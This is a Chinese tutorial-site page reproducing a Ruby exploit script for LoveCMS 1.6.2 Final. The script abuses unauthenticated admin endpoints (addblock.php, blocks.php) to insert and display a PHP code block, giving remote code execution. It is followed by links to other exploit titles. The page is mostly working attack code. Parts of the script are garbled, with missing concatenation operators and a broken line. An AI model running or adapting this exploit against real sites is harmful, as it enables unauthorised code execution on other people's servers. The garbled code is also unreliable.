手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Remote Code Execution Exploit
LoveCMS 1.6.2 Final Remote Code Execution Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 1: adding a side block

##

## Description: add some php into a block container

## on the side of the site. phpinfo() is called.

##

## Usage: ./LoveCMS_1_blocks.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

# require 'net/http'

require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host

# --

puts " LoveCMS Exploit Series. #1: Adding side blocks."

puts

puts " : Attacking host: " @host # --

# Insert a new block

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),

{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})

puts " :: Block inserted." # --

# Build post variable for next step

post_vars = {'submit' => 1}

(1..50).each do |id|

post_vars['position' id.to_s] = 1

post_vars['height' id.to_s] = 1

post_vars['visible' id.to_s] = 1

end

# Make the block visible

res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )

puts " :: Blocks displayed." # --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Remote Code Execution Exploit】相关文章:

minb 0.1.0 Remote Code Execution Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

精品推荐
分类导航